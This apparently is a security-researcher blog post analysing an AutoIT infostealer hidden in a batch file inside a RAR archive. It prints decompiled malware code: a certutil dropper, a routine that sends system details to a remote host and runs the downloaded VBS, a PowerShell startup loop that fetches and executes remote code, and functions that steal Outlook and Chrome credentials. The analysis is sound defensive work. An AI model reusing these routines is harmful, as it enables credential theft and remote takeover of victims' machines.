AutoIT Remains Popular in the Malware Landscape
Yesterday Brad wrote an interesting diary[1] about a piece o malware based on AutoIT. Funny, I was also analyzing a sample that has been written in the same language. I don’t know exactly the source (it was spotted via a hunting ruile) but it seems to target the same people (based on the file name). Mine was delivered in a RAR archive called “doc-Impostos_514281.rar” (SHA256:84a35910ad7acb1455695be7aced111356fac9abc818f9ae0859677b07ac0d04). The VT score is very low: 1/61[2].
The archive contains a Windows batch file:
remnux@remnux:/MalwareZoo/20230105$ rar t doc-Imposto_514281.rar RAR 5.50 Copyright (c) 1993-2017 Alexander Roshal 11 Aug 2017 Trial version Type 'rar -?' for help Testing archive doc-Imposto_514281.rar Testing doc-Impostos.cmd OK All OK
The .cmd file (SHA256:f6e84e43323ed9d8531fa2aeeb3c181c8f84fcbe950ce6dcdd8c3fa0b02c6cc0). Here again, the same VT score[3]. It is quite large for this type of file (1.4MB) and when you check it, it looks suspicious:
remnux@remnux:/mnt/hgfs/MalwareZoo/20230105$ head doc-Impostos.cmd
if not DEFINED sexton set sexton=1 && start "" /min "%~dpnx0" %* && exit goto g -----BEGIN CERTIFICATE----- o0hLvphsSqmZTFMKhtZIfUFVMyFFQTA2Taj/cySnPPZ6EvFnrMGT52tDylKmrQAA 4bs6IaUp4+znC5guQL3hmt6ARrGdazsh1LHWdTrIPcbQM/cUr8sXopQBjROI/mSV Yee2TRv4AABrOlzazS6YAkunKeO9Ocao3hrw/HClY1NYGAr7zQEV+ujrd0/5T4Eb LQkHenqNqmVECaFi2fNA7MREm5Y300h/rP+Dp9eDW7LEl9tm6Wo9JsM/GecjC6hN 4GGLI3yLeSYHKm3CVyjE5Hf7c+2krxa5qaqV6HmkALyHAAC8hwAAhKYAAFwb2QFN 58IRXBvZAU3nwhFrQ8pSr60AAOb7JXjI4hP5fR3t3XEAsFUtrJrVKBXU8M8l5M8R jlbCzj9w77loH/gAANjQmDyxWa/YFeZ3XooB+qbTr+kRo45T/dFF7Jl0WDCjlCuG
When execute, the script jumps directly to a label “g”. Let’s search it and we found the interesting code below in the file:
:g cd /D %~dp0 set hammond=%appdata%\green\ set vasquez=%~n0 set sharpe=vcolon set maddox= if not exist "%hammond%exe\%sharpe%\thomas%maddox%.exe" ( mkdir "%hammond%exe\%sharpe%\" more +5 %0 >~~ powershell -Command "(gc ~~) -replace '>', '' | Out-File -encoding ASCII ~~" certutil -decode -f ~~ "%hammond%exe\%sharpe%\thomas%maddox%.exe" del ~~ ) set hash=stanley call :ts %0 "%hammond%a3x\%hash%\%vasquez%.a3x" if %t1% geq %t2% ( mkdir "%hammond%a3x\%hash%\" certutil -decode -f %0 "%hammond%a3x\%hash%\%vasquez%.a3x"
This piece of code does the magic and extract the chunk of Base64 data from the script using certutil.exe.
The batch file contains 2 chunks of data that once extracted are:
- thomas.exe (SHA256:237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
- doc-Impostos.a3x (SHA256:d07d4d7a6314c51ff078c2f952d17afa7af1d6f638d47d6d793e102538a2dbf9)
The PE file is just a standalone AutoIT interpreter that will receive the second file as argument. ".a3x" is the extension used by files compiled with AutoIT v3. The AutoIt file is executed thtough wmic:
wmic process call create '"%hammond%exe\%sharpe%\thomas%maddox%.exe" "%hammond%a3x\%hash%\%vasquez%.a3x" "%*"' ,%wdir%
Let’s have a look at the AutoIT script. There exists tools to perform this task. The most popular is myAutToExe.exe[4] (be careful, this tool is a bit shady and can be found from multiple locations that are not always safe!)
But, why AutoIT remains popular for malware? This language has been developed, like the name says, to automate actions in a Windows environment. This means that you can select windows, move the mouse, click on buttons, … But AutoIt can also work at a lower level and, interesting in the context of malware, use any Windows API via the DllCall() function.
Here is an example found in the decompile script:
FUNC _WINAPI_WRITEPROCESSMEMORY($HPROCESS, $PBASEADDRESS, $PBUFFER, $ISIZE, BYREF $IWRITTEN, $SBUFFER = "ptr") LOCAL $ARESULT = DLLCALL("kernel32.dll", "bool", "WriteProcessMemory", "handle", $HPROCESS, "ptr", $PBASEADDRESS, \ $SBUFFER, $PBUFFER, "ulong_ptr", $ISIZE, "ulong_ptr*", 0) IF @ERROR THEN RETURN SETERROR(@ERROR, @EXTENDED, FALSE) $IWRITTEN = $ARESULT[5] RETURN $ARESULT[0] ENDFUNC
WriteProcessMemory is very useful to perform process injection!
What are the main capabilities of this malware?
First, it downloads and executes a VBS payload (some information about the victim are exfiltrated):
GLOBAL $URL_TARGET = "hxxps://publicpressmagazine[.]com/images/swan/do/it.php" IF _ISWIN7() THEN $URL_TARGET = "http://publicpressmagazine.com/images/swan/do/it.php" LOCAL $ISADMIN = "User" IF ISADMIN() THEN $ISADMIN = "Admin" $URLBIN = $URL_TARGET & "?b1=1&v1=" & DEC(@OSLANG) & "&v2=" & DEC(@KBLAYOUT) & "&v3=" & _GETOS() & "&v4=" & $ISADMIN & "&v5=" & @OSARCH $SPATHBIN = @TEMPDIR & "\nh38fj2745td.txt" IF $URLBIN <> "" THEN INETGET($URLBIN, $SPATHBIN, $INET_FORCEBYPASS) IF NOT FILEEXISTS($SPATHBIN) THEN _DOWNLOADFILE($URLBIN, $SPATHBIN) ENDIF FILEMOVE($SPATHBIN, $SPATHBIN & ".vbs") SHELLEXECUTE($SPATHBIN & ".vbs") ENDIF
(Note: The website has been cleaned and the payload was not available anymore)
It implements persistence via \Programs\Startup:
FUNC CREATESHORTCUTX() LOCAL $SSERIAL = HEX(DRIVEGETSERIAL(@HOMEDRIVE & "\")) LOCAL $STRPS = '$links = ("hxxp://moscowkov[.]xyz/sys/?h=' & $SSERIAL & '", "hxxp://moscowkov[.]at/sys/?h=' & $SSERIAL & '");for(;;){foreach($link in $links){try{$req = [System.Net.WebRequest]::Create($link);$resp = $req.GetResponse();$reqstream = $resp.GetResponseStream();$stream = new-object System.IO.StreamReader $reqstream;$result = $stream.ReadToEnd();Write-Output $result;try{IEX $result;}catch{}Write-Output "60";Start-Sleep -Seconds 60;break;}catch{Write-Output "e";}}Start-Sleep -Seconds 10;}' LOCAL $ARRAYTOREPLACE = STRINGSPLIT("$links|$link|$req|$resp|$re1qstream|$str3am|$result", "|") FOR $I = 1 TO $ARRAYTOREPLACE[0] IF STRINGINSTR($STRPS, $ARRAYTOREPLACE[$I]) THEN $STRPS = STRINGREPLACE($STRPS, $ARRAYTOREPLACE[$I], "$" & GENERATE()) ENDIF NEXT $STRPS = STRINGREPLACE(_BASE64ENCODE(STRINGTOBINARY($STRPS, $SB_UTF16LE)), @LF, "") LOCAL CONST $STARTUP2 = @STARTMENUDIR & "\Programs\Startup\DriverAudio.lnk" FILEDELETE($STARTUP2) FILECREATESHORTCUT("%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe", $STARTUP2, "", "-WindowStyle hidden \ -ExecutionPolicy UnRestricted -Encoded " & $STRPS) SHELLEXECUTE($STARTUP2) ENDFUNC
It exfiltrates data from Outlook:
FUNC _GETINFORMATION() LOCAL $AREGISTRY[] = ["HKCU\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\", "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\", "HKCU\Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\", "HKCU\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\"] LOCAL $SOUTPUT = "" FOR $I = 0 TO UBOUND($AREGISTRY) - 1 IF _FINDREGISTRYKEYVALUENAME($AREGISTRY[$I], "Email") THEN IF _FINDREGISTRYKEYVALUENAME($AREGISTRY[$I], "POP3 Server") THEN $SOUTPUT &= _BIN2STR(_FINDREGISTRYKEYVALUENAME($AREGISTRY[$I], "POP3 Server")) & "," $SOUTPUT &= _BIN2STR(_FINDREGISTRYKEYVALUENAME($AREGISTRY[$I], "POP3 User")) & "," $SOUTPUT &= _UNPROTECT(BINARYMID(_FINDREGISTRYKEYVALUENAME($AREGISTRY[$I], "POP3 Password"), 2)) & @CRLF $SOUTPUT &= _BIN2STR(_FINDREGISTRYKEYVALUENAME($AREGISTRY[$I], "SMTP Server")) & "," $SOUTPUT &= _BIN2STR(_FINDREGISTRYKEYVALUENAME($AREGISTRY[$I], "POP3 User")) & "," $SOUTPUT &= _UNPROTECT(BINARYMID(_FINDREGISTRYKEYVALUENAME($AREGISTRY[$I], "POP3 Password"), 2)) & @CRLF ELSE $SOUTPUT &= _BIN2STR(_FINDREGISTRYKEYVALUENAME($AREGISTRY[$I], "IMAP Server")) & "," $SOUTPUT &= _BIN2STR(_FINDREGISTRYKEYVALUENAME($AREGISTRY[$I], "IMAP User")) & "," $SOUTPUT &= _UNPROTECT(BINARYMID(_FINDREGISTRYKEYVALUENAME($AREGISTRY[$I], "IMAP Password"), 2)) & @CRLF $SOUTPUT &= _BIN2STR(_FINDREGISTRYKEYVALUENAME($AREGISTRY[$I], "SMTP Server")) & "," $SOUTPUT &= _BIN2STR(_FINDREGISTRYKEYVALUENAME($AREGISTRY[$I], "IMAP User")) & "," $SOUTPUT &= _UNPROTECT(BINARYMID(_FINDREGISTRYKEYVALUENAME($AREGISTRY[$I], "IMAP Password"), 2)) & @CRLF ENDIF ENDIF NEXT RETURN $SOUTPUT ENDFUNC
It extracts passwords from Chrome:
FUNC _GETCHROMEPASSWORD() LOCAL $ACHROMEPASSWORD[1000][3] LOCAL $SBINCHROMEMASTERKEY = _GETMASTERKEY() LOCAL $HQUERY, $AROW LOCAL $SLOGINDATA = @LOCALAPPDATADIR & "\Google\Chrome\User Data\Default\Login Data" _LOG("Login DataPath: " & $SLOGINDATA) LOCAL $STEMPFILENAME = _TEMPFILE(@TEMPDIR, "", ".tmp", DEFAULT) FILECOPY($SLOGINDATA, $STEMPFILENAME, 1) IF NOT FILEEXISTS($STEMPFILENAME) THEN RETURN "" _LOG("OK") $SQLLIBRARY = @TEMPDIR & "\sqlite3.dll" IF NOT FILEEXISTS($SQLLIBRARY) THEN _DOWNLOADFILE("hxxps://www[.]autoitscript[.]com/autoit3/pkgmgr/sqlite/sqlite3.dll", $SQLLIBRARY) ENDIF IF NOT FILEEXISTS($SQLLIBRARY) THEN RETURN "" ENDIF _SQLITE_STARTUP($SQLLIBRARY, FALSE, TRUE) _SQLITE_OPEN($STEMPFILENAME) IF @ERROR THEN RETURN "" ENDIF _SQLITE_QUERY(-1, "SELECT * FROM logins;", $HQUERY) LOCAL $SURL = "" LOCAL $SUSERNAME = "" LOCAL $SPASSWORD = "" LOCAL $SBUFF = "" LOCAL $ICOUNT = 0 WHILE _SQLITE_FETCHDATA($HQUERY, $AROW, FALSE, FALSE) = $SQLITE_OK $SURL = $AROW[0] $SUSERNAME = $AROW[3] $SPASSWORD = $AROW[5] IF NOT $SUSERNAME OR NOT $SPASSWORD THEN CONTINUELOOP _LOG(">" & $SURL) _LOG($SUSERNAME) _LOG($SPASSWORD) $ACHROMEPASSWORD[$ICOUNT][0] = $SURL $ACHROMEPASSWORD[$ICOUNT][1] = $SUSERNAME $ACHROMEPASSWORD[$ICOUNT][2] = $SPASSWORD IF BINARYTOSTRING(BINARYMID($SPASSWORD, 1, 3)) = "v10" THEN $ACHROMEPASSWORD[$ICOUNT][2] = STRINGSTRIPWS(_CHROMEDECRYPTAES($SPASSWORD, $SBINCHROMEMASTERKEY), 2) $SBUFF = $SBUFF & $SURL & "|" & $SUSERNAME & "|" & $ACHROMEPASSWORD[$ICOUNT][2] & @CRLF ELSE $ACHROMEPASSWORD[$ICOUNT][2] = STRINGSTRIPWS(BINARYTOSTRING(_CHROMEDECRYPTOLD($SPASSWORD), 4), 2) $SBUFF = $SBUFF & $SURL & "|" & $SUSERNAME & "|" & $ACHROMEPASSWORD[$ICOUNT][2] & @CRLF ENDIF $ICOUNT += 1 WEND REDIM $ACHROMEPASSWORD[$ICOUNT][3] _SQLITE_CLOSE() _SQLITE_SHUTDOWN() FILEDELETE($STEMPFILENAME) RETURN $SBUFF ? $SBUFF : "" ENDFUNC
Extracted information is exfiltrated using HTTP POST requests.
[1] https://isc.sans.edu/diary/More%20Brazil%20malspam%20pushing%20Astaroth%20%28Guildma%29%20in%20January%202023/29404
[2] https://www.virustotal.com/gui/file/84a35910ad7acb1455695be7aced111356fac9abc818f9ae0859677b07ac0d04
[3] https://www.virustotal.com/gui/file/f6e84e43323ed9d8531fa2aeeb3c181c8f84fcbe950ce6dcdd8c3fa0b02c6cc0
[4] https://github.com/PonyPC/myaut_contrib/blob/master/readme.txt
Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
Comments